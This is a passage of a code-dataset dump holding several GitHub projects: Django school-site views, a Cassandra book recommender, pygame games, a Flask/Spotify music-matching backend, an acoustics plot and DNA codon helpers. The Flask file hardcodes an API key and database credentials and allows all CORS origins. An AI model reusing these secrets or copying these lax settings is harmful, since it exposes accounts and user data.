EmailField\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.files.storage import FileSystemStorage\nfrom .models import ExamScore, AllStudent, Profile\n\n\n# Create your views here.\n\ndef HomePage(request):\n #return HttpResponse('

Hello Robinoud

')\n return render(request, 'school/home.html')\n\ndef AboutPage(request):\n return render(request, 'school/about.html')\n\ndef ContactUs(request):\n return render(request, 'school/contactus.html')\n\ndef ShowScore(request):\n score = ExamScore.objects.all() # ดึงค่า จาก DB มาทั้งหมด\n\n context = {'score' : score}\n\n return render(request, 'school/showscore.html', context)\n\ndef Register(request):\n\n if request.method == 'POST':\n data = request.POST.copy()\n first_name = data.get('first_name')\n last_name = data.get('last_name')\n email = data.get('email')\n password = data.get('password')\n\n newuser = User()\n newuser.username = email\n newuser.first_name = first_name\n newuser.last_name = last_name\n newuser.email = email\n newuser.set_password(password)\n newuser.save()\n # from django.shortcuts import redirect\n return redirect('home-page')\n\n return render(request, 'school/register.html')\n\n############################ Search Page ###################################\n@login_required\ndef SearchStudent(request):\n # MODELS.object.all() ดึงค่ามาทั้งหมด\n # MODELS.object.get(student_id = '6300001') ดึงค่าแค่ตัวเดียว หากเกิน จะ error\n # MODELS.object.filter(level = 'ม.1') ดึงค่ามาหลายค่า\n if request.method == 'POST' and request.FILES['photoprofile']:\n data = request.POST.copy()\n searchid = data.get('search') \n print(searchid, type(searchid))\n try:\n result = AllStudent.objects.get(student_id = searchid)\n print('RESULT', result)\n context = {'result':result,'check':'found'}\n except:\n context = {'result':'ไม่มีข้อมูลในระบบ','check':'notfound'}\n\n return render(request, 'school/search.html', context)\n\n return render(request, 'school/search.html')\n\n\n############################ Edit Profile ###################################\n@login_required\ndef EditProfile(request):\n\n username = request.user.username\n current = User.objects.get(username=username)\n\n\n if request.method == 'POST':\n data = request.POST.copy()\n first_name = data.get('first_name')\n last_name = data.get('last_name')\n email = data.get('email')\n\n myprofile = User.objects.get(username=username)\n try:\n setprofile = Profile.objects.get(user=myprofile)\n except:\n setprofile = Profile()\n setprofile.user = myprofile\n\n ####### file system ########\n file_image = request.FILES['photoprofile']\n file_image_name = file_image.name\n fs = FileSystemStorage()\n filename = fs.save(file_image_name, file_image) \n upload_file_url = fs.url(filename)\n setprofile.photoprofile = upload_file_url[6:]\n setprofile.save()\n\n ####### \n myprofile.username = email\n myprofile.first_name = first_name\n myprofile.last_name = last_name\n myprofile.email = email\n myprofile.save()\n\n\n # from django.shortcuts import redirect\n return redirect('editprofile-page')\n\n context = {'data':current}\n return render(request, 'school/editprofile.html',context)","repo_name":"robinoud/djangoschool","sub_path":"djangoschool/school/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20816407171","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\n\n\nfrom cassandra.cqlengine import connection\nfrom cassandra.cqlengine.management import sync_table\nfrom cassandra.cluster import Cluster\nimport models\nfrom django.http import HttpResponse\nfrom django.db import connection\nimport logging\nlogger = logging.getLogger(__name__)\nfrom gender_detector import GenderDetector\nimport re\n\ndef connect():\n cluster = Cluster(['127.0.0.1'])\n session = cluster.connect()\n session.set_keyspace('prs')\n \ndef index(request):\n connect()\n cursor = connection.cursor()\n rows = cursor.execute(\"SELECT id, user_gid, precision, recall, username, gender FROM prs.recommendation where common_shelves_retrieved=true\") \n users=sorted(rows, key=lambda k: k['precision'], reverse=True) \n detector = GenderDetector('us')\n for i, user in enumerate(users):\n name=user['username'].replace('[', '').split(\" \")\n gender=\"\"\n try:\n gender=detector.guess(name[0])\n except Exception as e:\n gender=\"unknown\"\n\n new_user=dict(models.Recommendation( user_gid=user['user_gid'], gender=gender,precision=user['precision'], recall=user['recall'], username=user['username']))\n users[i]=new_user\n return render(request, 'recom/index.html', {'users': users})\n\ndef user(request, user_id): \n connect()\n user=dict(models.Recommendation.get(user_gid=user_id))\n name=user['username'].replace('[', '').split(\" \")\n detector = GenderDetector('us')\n gender=\"\"\n try:\n gender=detector.guess(name[0])\n except Exception as e:\n gender=\"unknown\"\n user['gender']=gender\n for j, book in enumerate(user['books_details_recommended']):\n for i, shelve in enumerate(book['list_shelves']):\n for best_shelve in user['most_common_shelves']:\n if(best_shelve.shelve==shelve.shelve):\n last_shelve=user['books_details_recommended'][j]['list_shelves'][i]\n new_shelve=models.shelve(count=last_shelve.count,votes=last_shelve.votes, gid=last_shelve.gid,\n best=True,shelve=last_shelve.shelve)\n user['books_details_recommended'][j]['list_shelves'][i]=new_shelve\n return render(request, 'recom/user.html', {'user': user}) \n\ndef book(request, book_id):\n connect()\n users = [dict(user) for user in Books.objects(gid=book_id)]\n return render(request, 'recom/book.html', {'users': users}) \n\n\n","repo_name":"Simone-cogno/MT-Product-Recommender-System_improved-with-social-network-information","sub_path":"Sources/webui/gr_recommendation/recom/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70319281707","text":"import pygame,sys\npygame.init()\n\nclass Player:\n\n\tdef __init__(self,rect):\n\t\tself.rect = pygame.Rect(rect)\n\t\tself.y = self.rect.y\n\t\tself.image = pygame.Surface((rect[2],rect[3]))\n\t\tself.image.fill((0,0,0))\n\t\tself.jump = False\n\t\tself.fall = False\n\t\tself.vel = 0\n\n\tdef draw(self,Game):\n\t\tif self.jump:\n\t\t\tself.vel -= 1\n\t\t\tself.rect.y += self.vel\n\t\t\tif self.vel == -15:\n\t\t\t\tself.jump = False\n\t\t\t\tself.vel = 0\n\t\telif self.fall:\n\t\t\tself.vel = 5\n\t\t\tself.rect.y += self.vel\n\t\t\tif self.rect.y > self.y:\n\t\t\t\tself.rect.y = self.y\n\t\t\t\tself.fall = False\n\t\telif self.rect.y < 0:\n\t\t\tself.fall = True\n\t\telif self.rect.y < self.y:\n\t\t\tself.vel = 1\n\t\t\tself.rect.y += self.vel\n\t\tGame.screen.blit(self.image,(self.rect.x,self.rect.y))\n\nclass Obstacle:\n\n\tdef __init__(self,rect):\n\t\tself.rect = pygame.Rect(rect)\n\t\tself.image = pygame.Surface((rect[2],rect[3]))\n\t\tself.image.fill((255,0,0))\n\t\n\tdef draw(self,Game):\n\t\tif self.rect.x == Game.player.rect.x and self.rect.y == Game.player.rect.y:\n\t\t\tGame.lose()\n\t\tGame.screen.blit(self.image,(self.rect.x,self.rect.y))\n\nclass Aviator:\n\n\tdef __init__(self,rect):\n\t\tself.rect = pygame.Rect(rect)\n\t\tself.image = pygame.Surface((rect[2],rect[3]))\n\t\tself.image.fill((0,255,0))\n\t\tself.bullets = []\n\n\tdef shoot(self):\n\t\tself.bullets.append(pygame.Rect((self.rect.x,self.rect.y + int(self.rect.height / 2) - 5,self.rect.width,10)))\n\n\tdef draw(self,Game):\n\t\tplayer = Game.player.rect\n\t\tfor bullet in self.bullets:\n\t\t\tbullet.x -= 5\n\t\t\tif (bullet.left <= player.left <= bullet.right or bullet.left <= player.right <= bullet.right) and \\\n\t\t\t(bullet.top <= player.top <= bullet.bottom or bullet.top <= player.bottom <= bullet.bottom):\n\t\t\t\tGame.lose()\n\t\t\tGame.screen.fill((0,0,255),bullet)\n\t\tself.rect.y = Game.player.rect.y\n\t\tif Game.total_frames % 30 == 0:\n\t\t\tself.shoot()\n\t\tGame.screen.blit(self.image,(self.rect.x,self.rect.y))\n\nclass Game:\n\n\tdef __init__(self,width = 600,height = 600):\n\t\tpygame.display.set_caption(\"Light As A Feather\")\n\t\tself.SIZE = (width,height)\n\t\tself.screen = pygame.display.set_mode((width,height))\n\t\tself.clock,self.FPS,self.total_frames = pygame.time.Clock(),60,0\n\t\tself.player = Player((125,575,25,25))\n\t\tself.aviator = Aviator((425,575,25,25))\n\t\tself.obstacles = []\n\n\tdef textObjects(self,y,msg,size):\n\t\tfont = pygame.font.Font(None,int(size))\n\t\tsz = font.size(msg)\n\t\treturn font,sz,int(self.screen.get_width() / 2 - sz[0] / 2)\n\n\tdef render(self,y = 5,msg = \"Hello World!\",size = 30,color = (0,0,0)):\n\t\tfont,size,x = self.textObjects(y,msg,size)\n\t\tself.screen.blit(font.render(msg,True,color),(x,y))\n\n\tdef button(self,y = 5,msg = \"Hello World!\",size = 30,colors = [(0,200,0),(0,255,0)],func = None):\n\t\tfont,sz,x = self.textObjects(y,msg,size)\n\t\tmouse,click = pygame.mouse.get_pos(),pygame.mouse.get_pressed()\n\t\trect = pygame.Rect((x,y,sz[0],sz[1]))\n\t\tif rect.left <= mouse[0] <= rect.right and rect.top <= mouse[1] <= rect.bottom:\n\t\t\tself.render(y,msg,size,colors[1])\n\t\t\tif any(click):\n\t\t\t\ttry:\n\t\t\t\t\tfunc()\n\t\t\t\texcept TypeError:\n\t\t\t\t\tpass\n\t\telse:\n\t\t\tself.render(y,msg,size,colors[0])\n\n\tdef playAgain(self):\n\t\tGame().start()\n\n\tdef start(self):\n\t\twhile 1:\n\t\t\tself.screen.fill((255,255,255))\n\t\t\tself.render(msg = \"Light As A Feather.\",size = 50)\n\t\t\tself.button(y = 45,msg = \"Play\",func = self.run)\n\t\t\tself.button(y = 90,msg = \"Rules\",func = self.rules)\n\t\t\tpygame.display.flip()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_p:\n\t\t\t\t\t\tself.run()\n\t\t\t\t\telif event.key == pygame.K_r:\n\t\t\t\t\t\tself.rules()\n\n\tdef rules(self):\n\t\twhile 1:\n\t\t\tself.screen.fill((255,255,255))\n\t\t\tself.render(msg = \"Rules\",size = 50)\n\t\t\tself.render(y = 45,msg = \"Press ,,or to jump.\",size = 20)\n\t\t\tself.render(y = 90,msg = \"Avoid the red pixels and blue bullets.\",size = 20)\n\t\t\tself.render(y = 135,msg =\"When you hit the top of the screen, you fall rapidly.\",size = 20)\n\t\t\tself.render(y = 180,msg = \"When you hit the ground, you negate this effect.\",size = 20)\n\t\t\tself.render(y = 225,msg = \"Press ,,,and to go left and right.\",size = 20)\n\t\t\tself.button(y = 270,msg = \"Play\",func = self.run)\n\t\t\tpygame.display.flip()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_p:\n\t\t\t\t\t\tself.run()\n\n\tdef lose(self):\n\t\twhile 1:\n\t\t\tself.screen.fill((255,255,255))\n\t\t\tself.render(msg = \"Good Try.\",size = 50)\n\t\t\tself.render(y = 45,msg = \"Your Score: {}\".format(int(self.total_frames / self.FPS)))\n\t\t\tself.button(y = 90,msg = \"Play Again\",func = self.playAgain)\n\t\t\tpygame.display.flip()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_p:\n\t\t\t\t\t\tGame().run()\n\n\tdef spawn(self):\n\t\tself.obstacles.append(Obstacle((425,575,25,25)))\n\n\tdef run(self):\n\t\twhile 1:\n\t\t\tkey = pygame.key.get_pressed()\n\t\t\tif any([key[pygame.K_a],key[pygame.K_LEFT]]):\tself.player.rect.x -= 3\n\t\t\tif any([key[pygame.K_d],key[pygame.K_RIGHT]]):\tself.player.rect.x += 3\n\t\t\tself.total_frames += 1\n\t\t\tif self.total_frames % 36 == 0:\n\t\t\t\tself.spawn()\n\t\t\tself.clock.tick(self.FPS)\n\t\t\tself.screen.fill((255,255,255))\n\t\t\tself.render(msg = \"Score: {}\".format(int(self.total_frames / self.FPS)))\n\t\t\tself.player.draw(self)\n\t\t\tself.aviator.draw(self)\n\t\t\tfor obstacle in self.obstacles:\n\t\t\t\tobstacle.rect.x -= 5\n\t\t\t\tobstacle.draw(self)\n\t\t\tpygame.display.flip()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key in [pygame.K_w,pygame.K_UP,pygame.K_SPACE]:\n\t\t\t\t\t\tself.player.jump = True\n\nif __name__ == \"__main__\":\n\tGame().start()","repo_name":"Avedati/PythonGames","sub_path":"games/Light As A Feather.py","file_name":"Light As A Feather.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70124222826","text":"import base64\r\nimport json \r\nimport os\r\nimport pandas as pd\r\nimport requests\r\nimport random\r\nimport spotipy\r\nimport time\r\nimport uuid\r\n\r\n\r\nfrom copy import deepcopy\r\nfrom bson.json_util import dumps\r\nfrom dotenv import load_dotenv\r\nfrom flask import Flask, jsonify, redirect, session, request\r\nfrom flask_cors import CORS, cross_origin\r\nfrom flask_session import Session\r\nfrom flask_socketio import SocketIO, send, emit, join_room, leave_room\r\nfrom lyric_generator import *\r\nfrom match import *\r\nfrom pymongo import MongoClient\r\nfrom spotipy.oauth2 import SpotifyOAuth\r\n\r\nTEST_USERS = pd.read_csv(\"test_users.csv\")\r\nDEBUG = True\r\n\r\nload_dotenv()\r\nscope = \"streaming user-read-private user-read-email user-library-read user-library-modify user-read-playback-state user-modify-playback-state\"\r\n\r\nDB_USER = os.environ.get(\"DB_USER\")\r\nREDIRECT = os.environ.get(\"REDIRECT\")\r\nDB_PASSWORD = os.environ.get(\"DB_PASSWORD\")\r\nDB_CLUSTER_URL = os.environ.get(\"DB_CLUSTER_URL\")\r\nSPOTIFY_CLIENT_ID = os.environ.get(\"SPOTIFY_CLIENT_ID\")\r\nSPOTIFY_CLIENT_SECRET = os.environ.get(\"SPOTIFY_CLIENT_SECRET\")\r\nIMGUR_CLIENT_ID = os.environ.get(\"IMGUR_CLIENT_ID\")\r\nIMGUR_CLIENT_SECRET = os.environ.get(\"IMGUR_CLIENT_SECRET\")\r\nauthMechanism = \"DEFAULT\"\r\n\r\nNEW_USER = \"m001-student\"\r\nPASS = \"capstone\"\r\nmongo_uri = f\"mongodb+srv://{DB_USER}:{DB_PASSWORD}@{DB_CLUSTER_URL}/?authMechanism={authMechanism}\"\r\nmongo_uri2 = f\"mongodb+srv://{NEW_USER}:{PASS}@sandbox.679hr.mongodb.net/?authMechanism={authMechanism}\"\r\n\r\nbase_url = \"https://api.musixmatch.com/ws/1.1/\"\r\napi_key = \"&apikey=b47d930cf4a671795d7ab8b83fd74471\"\r\n#CORS(app)\r\n\r\nDB_CLIENT = MongoClient(mongo_uri)\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['SECRET_KEY'] = uuid.uuid4().hex\r\napp.config[\"SESSION_COOKIE_NAME\"] = \"Spotify Cookie\"\r\napp.config[\"SESSION_COOKIE_HTTPONLY\"] = False\r\napp.config['SESSION_TYPE'] = 'filesystem'\r\napp.config['SESSION_FILE_DIR'] = './.flask_session/'\r\nsocketio = SocketIO(app,cors_allowed_origins=\"*\")\r\nTOKEN_INFO = \"code\"\r\nCORS(app, resources={r\"/*\":{\"origins\":\"*\"}})\r\nSession(app)\r\n\r\n@socketio.on('join')\r\ndef on_join(data):\r\n room = data\r\n # print(\"room: \" + room)\r\n join_room(room)\r\n\r\n@socketio.on('leave')\r\ndef on_leave(data):\r\n room = data\r\n print(\"I left the room ya hurd: \" + room)\r\n leave_room(room)\r\n \r\n@socketio.on(\"message\")\r\ndef handle_message(message):\r\n # print(\"Received message: \" + message['ms'])\r\n # print(\"I have been triggered\")\r\n emit('my_response', message, broadcast=True)\r\n return None\r\n\r\n@socketio.on(\"connect\")\r\ndef connected():\r\n \"\"\"event listener when client connects to the server\"\"\"\r\n # print(request.sid)\r\n print(\"client has connected\")\r\n emit(\"connect\",{\"data\":f\"id: {request.sid} is connected\"})\r\n\r\ndef create_auth(cache_handler):\r\n return SpotifyOAuth(\r\n scope=scope,\r\n client_id=SPOTIFY_CLIENT_ID,\r\n client_secret=SPOTIFY_CLIENT_SECRET,\r\n redirect_uri=REDIRECT,\r\n cache_handler=cache_handler\r\n )\r\n\r\n@app.route(\"/current_user\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef current_user():\r\n cache_handler = spotipy.cache_handler.FlaskSessionCacheHandler(session)\r\n auth_manager = create_auth(cache_handler)\r\n\r\n sp = spotipy.Spotify(auth_manager=auth_manager)\r\n return json.dumps({\"user\":sp.current_user()})\r\n\r\n@app.route(\"/user_tracks\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef get_tracks():\r\n sp = None\r\n try:\r\n cache_handler = spotipy.cache_handler.FlaskSessionCacheHandler(session)\r\n auth_manager = create_auth(cache_handler)\r\n\r\n sp = spotipy.Spotify(auth_manager=auth_manager)\r\n except:\r\n return {\"msg\":\"no valid logged in user\"}\r\n l = []\r\n for j in range(10):\r\n songs = sp.current_user_saved_tracks(limit=50, offset=j*50)['items']\r\n for i in songs:\r\n if i in l:\r\n return dumps(l)\r\n album = i[\"track\"][\"album\"][\"name\"].replace(\" \", \"-\")\r\n name = i[\"track\"][\"name\"].replace(\" \", \"-\")\r\n im = i[\"track\"][\"album\"][\"images\"][1][\"url\"]\r\n uri = i[\"track\"][\"uri\"]\r\n artist = i[\"track\"][\"artists\"][0][\"name\"].replace(\" \", \"-\")\r\n duration = i[\"track\"][\"duration_ms\"]\r\n item = {\"name\": name, \"image\":im, \"artist\":artist, \"uri\":uri, \"album\":album, \"duration\": duration}\r\n if len(i[\"track\"][\"artists\"]) == 1:\r\n l.append(item)\r\n return dumps(l)\r\n\r\n\r\n@app.route(\"/get_song_words\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef getLyrics():\r\n bdy = request.get_json()\r\n count = len(bdy)\r\n while count:\r\n try:\r\n index = random.randint(0,len(bdy)-1)\r\n song = bdy[index]\r\n bdy.pop(index)\r\n lyric = lyrics(song['name'], song['artist'])\r\n return jsonify(lyric)\r\n except:\r\n count-=1\r\n return {\"msg\":\"Oops... Seeming to have difficulty with retrieving lyrics.\"}\r\n\r\n@app.route(\"/create_user\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef create_user():\r\n user_data = request.get_json()\r\n db = DB_CLIENT[\"main\"]\r\n user = db.accounts.insert_one(user_data)\r\n likes = db.likes.insert_one({\r\n \"user\":user_data[\"spotify_id\"],\r\n \"liked\":[]\r\n })\r\n return {}\r\n\r\n@app.route(\"/update_user\", methods=['GET','PUT'])\r\n@cross_origin(supports_credentials=True)\r\ndef update_user():\r\n user_data = request.data.decode(\"utf-8\")\r\n user_data = json.loads(user_data)\r\n user_data.pop('_id', None)\r\n db = DB_CLIENT[\"main\"]\r\n user = db.accounts.replace_one({\"spotify_id\":user_data[\"spotify_id\"]},user_data)\r\n return {}\r\n\r\n# have a threshold of when to call it again (first time should be on account creation)\r\n@app.route(\"/match\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef match():\r\n # just have it find users here\r\n user_data = request.data.decode(\"utf-8\")\r\n user_data = json.loads(user_data)\r\n user_data.pop('_id', None)\r\n client = MongoClient(mongo_uri)\r\n db = client[\"main\"] \r\n bruh = db.accounts.find({\"spotify_id\":{\"$ne\":user_data[\"spotify_id\"]},\"cluster\":user_data[\"cluster\"], \"isActive\":True},{\"_id\":0}).limit(1000)\r\n l =[]\r\n for i in bruh:\r\n l.append(i)\r\n print(l)\r\n if not len(l):\r\n raise Exception(\"No User Found\")\r\n return {\"user\":l}\r\n\r\n\r\n@app.route(\"/get_all_users\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef allUser():\r\n client = MongoClient(mongo_uri)\r\n db = client[\"main\"]\r\n users = db.accounts.find({})\r\n peeps = []\r\n for d in users:\r\n peeps.append(d)\r\n return dumps({\"allUsers\":peeps})\r\n\r\n\r\n@app.route(\"/kmeans\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef kmeans_train():\r\n now = time.time()\r\n user_data = request.data.decode(\"utf-8\")\r\n user_data = json.loads(user_data)\r\n user_data.pop('_id', None)\r\n\r\n db = DB_CLIENT[\"main\"]\r\n\r\n data = None\r\n if DEBUG:\r\n data = debug_create_genre_list(TEST_USERS)\r\n else:\r\n data = create_genre_list()\r\n data = data[list(data.keys())[0]]\r\n data[\"spotify_id\"] = user_data[\"spotify_id\"]\r\n\r\n cluster = kmeans(data, TEST_USERS)\r\n if DEBUG:\r\n cluster = 0\r\n user_data[\"cluster\"] = cluster\r\n\r\n db.accounts.replace_one({\"spotify_id\":user_data[\"spotify_id\"]},user_data)\r\n\r\n print(time.time() - now, \"END OF ENDPOINT\")\r\n return json.dumps({\"kmeans\":cluster})\r\n\r\n@app.route(\"/refresh\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef refresh():\r\n cache_handler = spotipy.cache_handler.FlaskSessionCacheHandler(session)\r\n auth_manager = create_auth(cache_handler)\r\n\r\n sp = spotipy.Spotify(auth_manager=auth_manager)\r\n\r\n token_info = sp.refresh_access_token(token_info[\"refresh_token\"])\r\n\r\n return json.dumps(\r\n {\r\n \"accessToken\" : token_info[\"access_token\"],\r\n \"refreshToken\" : token_info[\"refresh_token\"],\r\n \"expiresIn\" : token_info[\"expires_in\"]\r\n })\r\n\r\n@app.route(\"/spotify\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef spotify():\r\n code = request.data.decode(\"utf-8\")\r\n cache_handler = spotipy.cache_handler.FlaskSessionCacheHandler(session)\r\n sp = create_auth(cache_handler)\r\n\r\n session.clear()\r\n token_info = sp.get_access_token(code)\r\n\r\n session[TOKEN_INFO] = token_info\r\n session.modified = True\r\n\r\n return json.dumps(\r\n {\r\n \"accessToken\" : token_info[\"access_token\"],\r\n \"refreshToken\" : token_info[\"refresh_token\"],\r\n \"expiresIn\" : token_info[\"expires_in\"]\r\n })\r\n\r\n@app.route(\"/user\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef user():\r\n user_id = request.data.decode(\"utf-8\")\r\n db = DB_CLIENT[\"main\"]\r\n\r\n user = db.accounts.find_one({\"spotify_id\":user_id})\r\n\r\n return dumps({\"user\":user})\r\n\r\n@app.route(\"/upload\", methods=['POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef upload():\r\n\r\n file = request.files[\"file\"]\r\n headers = {\"Authorization\": \"Client-ID \"+ IMGUR_CLIENT_ID}\r\n\r\n b64_image = base64.standard_b64encode(file.read())\r\n data = {'image': b64_image, 'title': str(uuid.uuid4().hex)}\r\n\r\n req = requests.post(url=\"https://api.imgur.com/3/upload.json\", data=data,headers=headers)\r\n if req.status_code!=200:\r\n return {\"code\":404}\r\n link = req.json()[\"data\"][\"link\"]\r\n return {\"code\":200,\"link\":link}\r\n\r\n@app.route(\"/posts\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef posts():\r\n db = DB_CLIENT[\"main\"]\r\n posts = db.posts\r\n if request.method == \"GET\":\r\n return dumps(posts.find().limit(30))\r\n else:\r\n post_data = request.data.decode(\"utf-8\")\r\n post_data = json.loads(post_data)\r\n posts.insert_one(post_data)\r\n return {}\r\n\r\n@app.route(\"/chats\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef chats():\r\n db = DB_CLIENT[\"main\"]\r\n matches = db.matches\r\n user_data = request.data.decode(\"utf-8\")\r\n print(user_data)\r\n \r\n m = matches.find({\"id\":user_data}).limit(20)\r\n print(m[0])\r\n l = []\r\n for i in m:\r\n l.append(i)\r\n print(l, \"l\")\r\n return dumps(l)\r\n\r\n@app.route(\"/posts//like\", methods=['GET','POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef like(id):\r\n user_id = request.data.decode(\"utf-8\")\r\n db = DB_CLIENT[\"main\"]\r\n user = db.likes.find_one({\"user\":user_id})\r\n post = db.posts.find_one({\"post_id\":id})\r\n if user and id in user[\"liked\"]:\r\n user[\"liked\"].remove(id)\r\n post[\"likes\"]-=1\r\n else:\r\n user[\"liked\"].append(id)\r\n post[\"likes\"]+=1\r\n db.likes.replace_one({\"user\":user_id},user)\r\n db.posts.replace_one({\"post_id\":id},post)\r\n return dumps(db.posts.find({}).limit(20))\r\n\r\n@app.route(\"/addChat\", methods = ['POST', 'PUT'])\r\n@cross_origin(supports_credentials=True)\r\ndef postChat():\r\n bdy = request.get_json()\r\n\r\n db = DB_CLIENT[\"main\"]\r\n matches = db.matches\r\n try:\r\n match_data = request.data.decode(\"utf-8\")\r\n match_data = json.loads(match_data)\r\n\r\n matches.replace_one({\"id\": match_data[\"id\"]},match_data, upsert=True)\r\n return dumps({\"message\":\"succeeded in updating db\"})\r\n except:\r\n return dumps({\"message\":\"error with updating to db. please try again\"})\r\n\r\nif __name__ == \"__main__\":\r\n app.run(\"127.0.0.1\")\r\n # socketio.run(app, debug=True,port=5000)","repo_name":"Delkik/Love-Track-Refactor","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73008292267","text":"# global constants\n\nimport pygame\n\n# program settings\nTITLE = 'Jetpack Goodride'\nICON_LOC = 'assets/sprites/icon.png'\nDEFAULT_FONT_LOC = 'assets/fonts/New Athletic M54.ttf'\nHIGH_SCORE_LOC = 'save/highscore.txt'\nWIDTH = 1280\nHEIGHT = 720\nFPS = 300\n\n# player settings\nDEFAULT_X_VELOCITY = 480\nMAX_X_VELOCITY = 690\nGRAVITY = 1.7\n\n# scenario settings\nFIRST_OBSTACLE_OFFSET = 1920\nOBSTACLE_OFFSET = 680 # 520-860\nMIN_OBSTACLE_OFFSET = 520\nMAX_OBSTACLE_OFFSET = 860\nMIN_HEIGHT = 645\nMAX_HEIGHT = 80\n# OBSTACLE_Y_POSITIONS = [190, 278, 365, 453, 540]\n\n# colors\nBLACK = pygame.color.Color(0, 0, 0)\nWHITE = pygame.color.Color(255, 255, 255)\nYELLOW = pygame.color.Color(255, 255, 0)\nYELLOW_COIN = pygame.color.Color(255, 189, 28)\n\n# audio\n# MUSIC_LOC_LIST = []\n\n# DEBUG\nDEBUG = False\nDEBUG_HIT_BOXES = True\nDEBUG_SCREEN_SIZE_BOX = True\n","repo_name":"Gustavo-Pauli/Jetpack-Goodride","sub_path":"scripts/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"36807690618","text":"from factualaudio.plot_format import format_spectrum\nimport factualaudio.iso9613 as iso9613\nimport numpy as np\n\ndef plot_air_attenuation(axes, temperature_celsius, relative_humidity_percentage, *args, **kwargs):\n ambient_pressure_kpa = 101.325 # Mean sea level pressure\n temperature_kelvin = iso9613.celsius_to_kelvin(temperature_celsius)\n water_concentration_percentage = iso9613.relative_humidity_to_water_concentration(\n ambient_pressure_kpa, relative_humidity_percentage, temperature_kelvin)\n x = np.linspace(20, 20000, num=1000)\n return axes.semilogx(\n x, -10*iso9613.atmospheric_absorption_coefficient(x, ambient_pressure_kpa, water_concentration_percentage, temperature_kelvin),\n label=str(temperature_celsius)+' °C; '+str(relative_humidity_percentage)+' %RH', *args, **kwargs)\n\ndef populate_figure(figure):\n axes = figure.add_subplot(1, 1, 1)\n plot_air_attenuation(axes, 10, 30, linestyle='--')\n plot_air_attenuation(axes, 20, 50)\n plot_air_attenuation(axes, 30, 70, linestyle='--')\n format_spectrum(figure)\n axes.legend(loc='lower left')\n axes.set_ylim(-6, 1)\n axes.set_ylabel('Gain over 10 meters (dB)')\n","repo_name":"factualaudio/factualaudio","sub_path":"python/factualaudio/plots/air_attenuation.py","file_name":"air_attenuation.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"33847681575","text":"def isStopCodon(dna):\n '''\n indicate if the given sequence is stop codon or not\n :param dna:\n :return: bool\n >>> isStopCodon('TAA')\n True\n >>> isStopCodon('tag')\n True\n >>> isStopCodon('ATC')\n False\n '''\n # stop codon = TAG, TGA, TAA\n dna = str(dna)\n if dna.upper() in ['TAG', 'TGA', 'TAA']:\n return True\n else:\n return False\n\n\ndef reverseComplement(dna):\n '''\n retrun reverse complement of given DNA sequence in uppercase letters\n :param dna:\n :return:\n >>> reverseComplement('AAGTC')\n 'GACTT'\n >>> reverseComplement('agcttcgt')\n 'ACGAAGCT'\n >>> reverseComplement('AGTCTTACGCTTA')\n 'TAAGCGTAAGACT'\n '''\n dna = reversed(list(dna.upper()))\n final = ''\n for i in dna:\n if i == 'A':\n i = 'T'\n elif i == 'G':\n i = 'C'\n elif i == 'C':\n i = 'G'\n else:\n i = 'A'\n final += i\n return final\n\n\ndef stopCodons(sequence, n):\n '''\n return number of stop codons in the given reading frame of the DNA sequence\n :param sequence:\n :param n:\n :return:\n >>> seq = 'TTTACTATAGTGATAGCCGGTAACATAGCTCCTAGAATAAAGGCAACGCAATACCCCTAGG'\n >>> stopCodons(seq, +1)\n 1\n >>> stopCodons(seq, +2)\n 5\n >>> stopCodons(seq, +3)\n 2\n >>> stopCodons(seq, -1)\n 3\n >>> stopCodons(seq, -2)\n 0\n >>> stopCodons(seq, -3)\n 1\n '''\n if n < 0:\n sequence = reverseComplement(sequence)\n sequence = 